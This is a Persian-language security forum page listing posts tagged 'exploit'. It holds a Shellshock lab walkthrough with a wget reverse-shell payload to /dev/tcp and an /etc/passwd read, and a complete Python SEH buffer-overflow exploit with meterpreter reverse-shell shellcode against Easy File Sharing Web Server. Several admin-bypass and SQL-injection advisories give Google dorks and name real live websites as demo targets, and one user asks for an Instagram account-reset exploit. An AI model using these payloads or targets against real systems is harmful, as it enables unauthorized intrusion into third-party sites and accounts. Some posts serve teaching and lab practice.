با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.
جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'exploit'.
15 نتیجه پیدا شد
-
با سلام. یکی از مباحثی که تو حوزه اکسپلویتینگ مطرح هستش رو بستر ویندوز هستش. از یکی از سایتها یک مجموعه pdf از دوره اکسپلویت 2021 گیر اوردم و براتون آپلود کردم که شامل موارد زیر هستش: Unicode Buffer Overflows Windows Egghunting Exploits Study Guide Windows Return Oriented Programing Windows SEH-based Overflows Windows Shellcoding Windows Stack Overflow لینک دانلود: موفق باشید🌹
- 1 پاسخ
-
- 1
-
-
- exploit
- windows exploit
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
با سلام در حال جستجو در سطح نت بودم که به یه بحث رسید که جالب بود و خوشحال میشم با شما اشتراک بزارمش بحث ما هک اندروید توسط پایتون است . میشه گفت از کاتولاین برگرفته است PhoneSploit نصب git clone #File cd PhoneSploit pip install colorama python2 main_linux.py دانلود : PhoneSploit-master.zip منبع github حسبی الله
-
اکسپلویت روز صفر یا 0day Exploit
یک موضوع پاسخی ارسال کرد برای ooresiropo در Vulnerability Laboratory
سلام و درود بر دوستان عزیز میخواستم بپرسم از شما دوستان کسی میدونه چطور میشه exploit های سایت 0day.today رو از جایی رایگان به دست بیارم؟ اکسپلوست ریست کردن اکانت اینستا رو میخوام پیدا کنم. بگید ممنون میشم.❤❤❤- 4 پاسخ
-
- 0day attack
- 0day exploit
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
تحلیل آسیب پذیری Apache Struts2 + نحوه نفوذ
یک موضوع پاسخی ارسال کرد برای Mkali07 در آسیب پذیری های کشف و گزارش شده
با سلام امروزه آسیب پذیری های گوناگونی منتشر میشوند و روز به روز شرکت های بزرگ به چالش کشیده میشوند New Remote Code Execution (RCE) Vulnerability in Apache Struts 2 اما در این پست میخواهیم در مورد آسیب پذیری apache struts صحبت کنیم که خالی از لطف نیست در اینجا کد اثبات این آسیب پذیری هست که میتوانید جزییات آن را مشاهده کنید (CVE-2018-11776), طبق گفته معمار ارشد امنیت Recorded Future کد اثبات این آسیب پذیری در GitHub منتشر شد همراه با یک اسکریپت git link script python به زبان پایتون هست که در بالا مشاهده میکنید اشکالی که Apache Struts 2.3 تا 2.3.34 و 2.5 تا 2.5.16 را تحت تأثیر قرار می دهد به دلیل اعتبار نامناسب داده های ورودی هست توصیه میشود کاربران struts2.3 به نسخه 2.3.35 و کاربران struts 2.5 به 2.5.17 ارتقا دهند اما چگونگی بهره برداری از این نوع آسیب پذیری : در واقع هکر با استفاده از Content-Type مخرب در header http میاد کد خودش رو تزریق میکنه و به راحتی میتونه از راه دور کد دلخواه خود رو اجرا کند اما اسکن از این نوع آسیب پذیری که ایا تارگت مورد نظر آسیب پذیر هست یا خیر که میتونید با دستور زیر اینکارو انجام دهید nmap -p <port> --script http-vuln-cve2017-5638 --script-args path=<application path> <target IP Address> نگاهی کوچیک به حملات اخیر : این حملات از 1323 آدرس آی پی در 40 کشور مختلف هست درقمست دوم پست با ساختار نحوه نفوذ و نوع حمله آشنا میشیم در قسمت سوم این پست با نحوه چگونگی ساخت اسکریپت آشنا میشیم- 1 پاسخ
-
- apache struts2
- apache struts2 rce
-
(و 4 مورد دیگر)
برچسب زده شده با :
-
با سلام. سایتی پیدا کردم در زمینه پیدا کردن اکسپلویت در همه cms ها و وب سرور ها و ...... خیلی جالب و title بندی هستش و اگر اون اکسپلویت به ابزار خاصی هم نیاز داشته باشه بهتون میگه. https://sploitus.com خودتون ببینید بهتر متوجه میشید. موفق باشید.53.gif53.gif
-
- exploit
- search engine
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
بهره برداری از آسیب پذیری Shellshock توسط Burpsuite
یک موضوع پاسخی ارسال کرد برای Wikto در ابزار و مقالات Scanners
این آموزش یک آزمایشگاه تست نفوذ برای تولید و نشان دادن نحوه بهره برداری از آسیب پذیری ShellShock می باشد دانلود آسیب پذیر : https://www.pentesterlab.com/exercises/cve-2014-6271 اندازه: 19 مگابایت نوع سیستم عامل: لینوکس یک نقص در سمت Bash مورد ارزیابی برخی از متغیرهای محیطی خاص قرار گرفته است . یک مهاجم می تواند از این نقص برای رفع محدودیت های محیطی یا رفع محدودیت ها برای اجرای دستورات Shell استفاده کند که ما قبلا shellshock را با چارچوب Metasploit مورد سوء استفاده قرار دادیم. Shellshock به نام Bashdoor نیز شناخته می شود ، یک باگ امنیتی امنیتی در Unix Bash shell است که اولین مورد آن در 24 سپتامبر 2014 منتشر شد. بسیاری از سرویس های اینترنتی مانند بعضی از سرویس دهندگان وب، از Bash برای پردازش استفاده می کنند این درخواست، به مهاجم این اجازه را می دهد برای اجرای دستورات دلخواه به ایجاد نسخه های آسیب پذیر از Bash اقدام کند و مهاجم بتواند دسترسی غیرمجاز به سیستم کامپیوتری را به دست آورد . مرحله 1 – فایل ISO فوق را دانلود کنید و در Vmware Workstation نصب کنید در اینجا ما از کالی لینوکس (192.168.169.137) به عنوان یک مهاجم (همیشه) استفاده میکنیم و سعی میکنیم از طریق مرورگر (192.168.169.139) به IP Pentesterlab دسترسی پیدا کنیم که به صورت زیر است: درخواست را با استفاده از Intercept متوقف کنید و آن را به تب Spider بفرستید Burp Spider یک ابزار خودکار خزیدن (crawling) برای برنامه های کاربردی وب است در حالی که معمولا فرایند های دستی زمان زیادی را از شما می گیرد می توانید از Burp Spider به طور خودکار برای برنامه های بسیار بزرگ و با زمان کمتری از این این فرایند استفاده کنید. Burp Spider از تکنیک های مختلف برای خزیدن در محتوای برنامه استفاده می کند و به طور پیش فرض تمام پیوندها در دامنه را دنبال می کند ، فرم ها را با داده های ساختگی ارسال می کند و درخواست های بیشتری را (برای robots.txt، ریشه های دایرکتوری و ...) می سازد . در برخی موارد، اجرای خودکار Spider می تواند پیامدهای ناخواسته ای مانند ثبت نام حساب کاربری جدید ، تولید ایمیل های بازخورد یا تغییر حالت دیگر برنامه داشته باشد . برای بهره برداری از "Shellshock"، باید راهی برای گفتگو با Bash پیدا کنیم . به این معنی که CGI که از Bash استفاده می کند را پیدا خواهد کرد . CGI ها معمولا از پایتون یا پرل استفاده می کنند ، اما غیر معمول نیست (در سرورهای قدیمی)، CGI در Shell یا حتی C نوشته شده است. بنابراین ما یک اسکریپت به نام وضعیت “status” در زیر پوشه cgi-bin داریمMIME که از نوع JSON است. اگر از کد منبع صفحه اصلی نگاه کنید، یک لینک اسکریپت cgi وجود دارد که دستورات سیستم را اجرا می کند و آنها را در یک صفحه وب نمایش می دهد. پس از پیدا کردن صفحه CGI، میتوانید از «wget» برای آزمایش اینکه آیا آسیب پذیری ShellShock در این صفحه CGI وجود دارد یا خیر، استفاده کنید. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -c ‘echo vulnerable'” http://192.168.169.139/cgi-bin/status همانطور که در بالا می بینیم ، دستور “echo vulnerable” توسط سرور اجرا شده است، بنابراین به ShellShock آسیب پذیر است. در ابتدا یک ترمینال را به عنوان یک شنونده در پورت 5555 با استفاده از ابزار netcat تنظیم کنید. Command: nc -nlvp 5555 در ترمینال دیگری فرمان زیر که به اتصال بالا در پورت مشخص شده اتصال می دهد. Command: wget -U “() { test;};echo \”Content-type: text/plain\”; echo; /bin/bash -i >& /dev/tcp/192.168.169.137/5555 0>&1″ http://192.168.169.139/cgi-bin/status اگر شروع اتصال در حالت hanging باشد ، نشانه واقعا خوبی است ، CGI در انتظار شما برای اتصال است. با رفتن به Netcat می توانیم دستورات (whoami, id, uname -a ) را به صورت محلی تایپ کنیم و آنها را در سیستم آسیب دیده به اجرا در آوریم که در زیر نشان داده شده است: همانطور که دستگاه Pentesterlab متعلق به گروه sudoers است بنابراین با تایپ دستور "sudo / bin / bash" به راحتی می توانید ROOT را دریافت کنید. علاوه بر این، شما می توانید با BurpSuite هم اکسپلویت کنید. با استفاده از BurpSuite به جای Wget، هدر User-Agent را تغییر دهید و می توانید از Burp repeater استفاده کنید درخواست را متوقف کنید و به تب Repeater ارسال کنید: توجه داشته باشید : اطمینان حاصل کنید که در پایان درخواست خام خود را در Burp ، تعداد 2 خط خالی وجود دارد در غیر این صورت درخواست کار نخواهد کرد! بخش درخواست را با کد زیر تغییر دهید تا تست کنید آیا هدف آسیب پذیر است یا خیر. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘echo Vulnerable!’ همانگونه که قبلا دیده ایم ، اگر خطای سرور داخلی عدد 500 یا عدیدی که با 5 شروع شده باشد را نشان دهد، به این معنی است که هدف به ShellShock آسیب پذیر است. در گام بعد ، سعی کنید محتویات فایل /etc / passwd با همان کد را بردارید. GET /cgi-bin/status HTTP/1.0 user-agent: () { :; }; /bin/bash -c ‘cat /etc/passwd’ اما هیچ خروجی نمایش داده نشد. در گام بعدی سعی کنید دستگاه کالی لینوکس خود را با هدرهای کامل باز کنید . GET /cgi-bin/status HTTP/1.1 Host: 192.168.169.139 User-Agent: () { :; }; /bin/bash -c ‘ping -c 3 192.168.169.137’ Accept: text/html, application/xhtml-xml, application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 اکنون مشاهده می کنید عدد 200 را به عنوان پاسخ دریافت کردیم و خروجی روی صفحه نمایش داده می شود که شما با استفاده از ابزار TCPDUMP برای درخواست ICMP می توانید آن را تایید کنید. Command: tcpdump -i eth0 -n icmp ادامه دارد ... ( کپی فقط با ذکر منبع )- 1 پاسخ
-
- burp suite
- cgi
-
(و 2 مورد دیگر)
برچسب زده شده با :
-
Cmnice Solutions Admin Bypass With Noredirect
یک موضوع پاسخی ارسال کرد برای rajaz در آسیب پذیری های کشف و گزارش شده
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: cmnice solutions admin bypass with noredirect |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Vendor Homepage: https://cmnicesolutions.com |[+] Tested on : Windows |[+] Google Dork: intext:"by cmnice solutions" |[+] Home: iran-cyber.org |[+] Discovered By: r4j4z |--------------------------------------------------------------| |[+] poc |[+] Use Addons Noredirect |[+] ^http://www.site.com/admin/login.php |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://fahtara.com/admin/login.php |[+] read this doc (http://fahtara.com/admin/manual.pdf) |[+] http://deeprelaxspa.com/admin/login.php |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040222 -
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: 2X Ajans SQL injection |[+] |[+] Exploit Author: Iran Cyber Security Group |[+] Discovered By: r4j4z |[+] Vendor Homepage: http://www.2xajans.com |[+] Tested on : Windows |[+] Google Dork: intext:Design by 2X Ajans inurl:id= |[+] Home: iran-cyber.org |--------------------------------------------------------------| |[+] Examples : |[+] |[+] http://ustungucaktarma.com/urunler.php?id=9%27 |[+] |[+] http://www.gazibant.com/urunler.php?id=6%27 |[+] |[+] http://usgmadencilik.com/urun-detay.php?id=2%27 |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| https://cxsecurity.com/issue/WLB-2018040110
-
Bihar Web Solutions Admin Bypass
یک موضوع پاسخی ارسال کرد برای rajaz در آسیب پذیری های کشف و گزارش شده
https://cxsecurity.com/issue/WLB-2018020219 ########################## # Exploit Title: Bihar Web Solutions Admin Login Bypass # Google Dork : intext:Site Designed By : "Bihar Web Solutions Pvt. Ltd." # Date: 2018-02-18 # Exploit Author: Iran Cyber Security Group # Discovered By: r4j4z # Tested on : Windows ########################## Search dork and select Target. Put [/panel] After url such as : # http://site.com/panel # Now enter fill username and Password like the information below : # Username : '=' 'or' # Password : '=' 'or' ############################ # Demo : http://www.Target.com/panel http://lpsedu.co.in/panel ############################ -
با سلام # Exploit Title: PenelaDigital sql injection # Google Dork: intext:"Powered by PenelaDigital " inurl:".php?id=" # Date: 2017-12-24 # Vendor Homepage: http://www.peneladigital.pt/ # Tested on: Linux # Exploit Author: Mkali07 #My Team:https://iran-cyber.net/ # POC : # SQL Injection : *Open browser and search dork in google *Selected in target *Attack site http://site.com/[path].php?id=[sql] #Demo: http://pecipenela.pt/caract-carro.php?id=9%27 # Contact Wth Me : [email protected] Good luck لینک اکسپلویت : https://cxsecurity.com/issue/WLB-2017120188 موفق باشید
-
- exploit
- iran-cyber
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
بررسی آسیب پذیری تزریق کد | Code Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای 0xD0ctor در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام خدمت تمامی دوستان با یکی دیگه از آموزش های بررسی مختصر و مفید آسیب پذیری های تحت وب در خدمت شما هستیم ../ خب توی این تاپیک قصد داریم Code Injection رو توضیح بدیم ../ توی یک جمله مختصر و مفید میشه معرفیش کرد : آسیب پذیری که توسز اون میتونید Code های خودتون رو اجرا کنید ( اینجا منظور کد PHP ) ../ خب برای درک بهتر نمونه کدی ببینیم : $variable_id = "varid"; $x = $_GET['id']; eval("\$varid = \$x;"); خب اینجا کسی اگه یکم دقت کنه میتونه ببینه که از eval استفاده شده و راحت میشه کد PHP دلخواه رو اجرا کرد ../ خب مثال میزنیم ... اگه پارامتر ورودی id رو قرار بدیم : file.php?id=1; phpinfo() راحت میشه phpinfo رو دید و به راحتی میشه Code Injection رو انجام داد ../ امیدوارم مورد قبول واقع شده باشه، موفق باشید-
- code injection
- exploit
-
(و 5 مورد دیگر)
برچسب زده شده با :
-
بررسی آسیب پذیری تزریق لاگ | Log Injection Vulnerability
یک موضوع پاسخی ارسال کرد برای 0xD0ctor در تحلیل و بررسی آسیب پذیری های سایت و سرورها
سلام دوستان امروز میخوایم آسیب پذیری Log Injection رو به شما معرفی میکنیم ../ این آسیب پذیری به شما کمک میکنه که بتونید لاگی که خودتون دوست دارید رو توی لاگ بریزید ../ نمونه ای از این آسیب پذیری رو ببینید : String val = request.getParameter("val"); try { int value = Integer.parseInt(val); } catch (NumberFormatException) { log.info("Failed to parse val = " + val); } خب میبینید که اینجا صفحه پارامتد ورودی val رو میگیره و اگه عددی بود اون رو توی value میریزه و اگه نبود توی فایل لاگ متنی به این صورت قرار میده : INFO: Failed to parse val = (MATN) خب حالا شما به راحتی میتونید val رو هر چیزی بخواید بزارید و در لاگ قرار بدید ../ برای نمونه اگه پارامتر ورودی val رو با مقدار test%0a%0aINFO:+User+logged+out%3dc10n3r ارسال کنید اون موقع توی لاگ این قطعه قرار داده میشه : INFO: Failed to parse val=test INFO: User logged out=c10n3r موفق باشید-
- cross site scripting
- exploit
-
(و 8 مورد دیگر)
برچسب زده شده با :
-
Easy File Sharing Server 7.2 Seh Buffer Overflow + Egghunter
یک موضوع پاسخی ارسال کرد برای XoDiAK در آسیب پذیری های کشف و گزارش شده
اسیب پذیری بافر اورفلو در برنامه Easy File Sharing Web Server 7.2 https://packetstormsecurity.com/files/138589/Easy-File-Sharing-Web-Server-7.2-SEH-Buffer-Overflow.html https://cxsecurity.com/issue/WLB-2016090019 #!/usr/bin/python # Exploit Title: Easy File Sharing Web Server 7.2 SEH Buffer Overflow (EggHunter) # Date: 2016/8/31 # Exploit Author: Iran Cyber Security Group # Vendor Homepage: http://www.sharing-file.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 7.2 [LATEST] # Tested on: Microsoft Windows 7 Professional x86 [should Work On The Other Operating Systems] # CVE : N/A # Usage : python exploit.py [iP or Domain] # Discovered By Arash Khazaei (AKA XoDiAK) # Greetz To Iran Cyber Members & My Friends import sys,socket from struct import pack HOST = sys.argv[1] PORT = 80 # msfvenom -p windows/meterpreter/reverse_tcp -b '\x2f\x5c' -i 2 -f c 335 Byte # Replace It With Your Own Shellcode ! shellcode = ("w00tw00t" + "\xd9\xc9\xbf\x35\xfe\x35\x6e\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x4e\x31\x7e\x17\x83\xc6\x04\x03\x4b\xed\xd7\x9b\x6a\xff\xc1" "\x10\xa8\xf4\xa8\xf1\x79\x4b\x8d\xf4\xcf\x36\xbf\xbe\x1e\x4d" "\xd8\x43\x1a\xa9\x5b\x81\x1f\xdd\x18\x78\xb2\x84\x32\xfb\x61" "\x03\x6f\x9e\xe5\x0f\x3d\x70\x9b\xbb\xd1\x2e\x81\x1c\xa6\x79" "\x74\x27\x17\xde\x04\x4b\x10\x89\x6b\xd3\xe4\xc0\x6c\x47\x32" "\xf4\x44\xeb\x7e\x1e\xd7\x62\x4c\x56\x0f\x58\x2e\x1a\x12\xc9" "\x0e\x12\x81\x30\xc9\x30\x3c\x76\xc0\x7a\xc0\xe0\x3b\xba\x6f" "\xfc\x5b\xe3\x3f\x1c\xa6\x37\x3d\xf5\x6b\xf3\x1a\xe0\x82\x85" "\xc8\xee\xce\xc8\xa2\xf9\x0e\x84\xe3\xac\x36\xe6\x3b\xc0\xe7" "\x61\xc1\xd3\xef\xf1\x4e\xc3\xde\xfd\xc7\x77\x5b\x51\xbc\xab" "\x2d\xb9\x65\x03\xc1\x01\x47\xbe\x50\xe2\xfc\x96\x96\xab\xd3" "\xf8\x53\x15\x69\xc6\xcd\x34\xdb\xd3\xcd\xcc\xdd\x02\x24\x31" "\x9f\xc0\xce\x41\x53\xf0\xe0\xb1\xd7\x96\xfc\x16\xe4\x10\xba" "\xd0\xd0\x10\x02\x40\xdc\x33\x9d\xb5\x35\xbb\x3f\x4f\x93\x11" "\x9a\x16\x63\x1b\x60\xa1\xab\x5e\x05\xf2\x7c\x02\x57\x99\x90" "\x88\x4d\xcf\x60\x3a\x9f\x77\x8a\x9e\xff\x1c\x91\x61\xec\x5e" "\xd4\x08\x54\x76\xfb\xdb\x45\xda\x8f\x01\xba\xed\x01\xef\x09" "\xc1\x5d\x8f\x2b\x24\x69\xc0\xbf\x44\x03\x6e\x62\x7c\x39\x6a" "\xab\x18\x70\xe5\xff\xe6\x33\x3b\x2b\x37\xf1\xb3\x92\xd6\x59" "\xcc\xc8\xca\x8d\x9d\x34\xf9\x89\xf7\x26\xbc\x60\xa1\xdf\xcb" "\xa8\x9d\xd2\x9f\x33\x5a\x48\xb2\x8d\xc5\xaa\x9f\x3c\x37\x0b" "\x98\x35\x70\x3b\xe0") # Padding ! junk = "A" * 4061 # Next SEH nseh = "\xeb\x06\x90\x90" # 0x1000108b [imageLoader.dll] POP POP RET seh = pack('<L', 0x10018848) # Egg Hunter 32 Byte Tag = w00tw00t egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74" "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7") exploit = junk + nseh + seh + egghunter + shellcode + "\x90"*(len(junk)-4-4-32-8-335-5000) try: s = socket.socket() s.connect((HOST, PORT)) s.send("GET " + exploit + " HTTP/1.0\r\n\r\n") s.close() except: print "Can't Connect To Web Server ! Is it up ?" print "Evil Buffer Sended Successfully!" EFS Web Server 7.2. SEH Overflow (EggHunter).zip-
- 1
-
-
- buffer overflow
- exploit
-
(و 1 مورد دیگر)
برچسب زده شده با :
-
دانلود کتاب Offensive Security Cracking the Perimeter پسورد : iran-cyber.net Offensive.Security.BackTrack.to.the.Max.Cracking.the.Perimeter.v1.0[iran-cyber.net].rar
-
- exploit
- exploit development
-
(و 2 مورد دیگر)
برچسب زده شده با :
تاریخچه انجمن امنیتی ایران سایبر
شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.
این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.
آدرس های داخلی شرکت
آدرس های داخلی شرکت
رعایت قوانین
شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.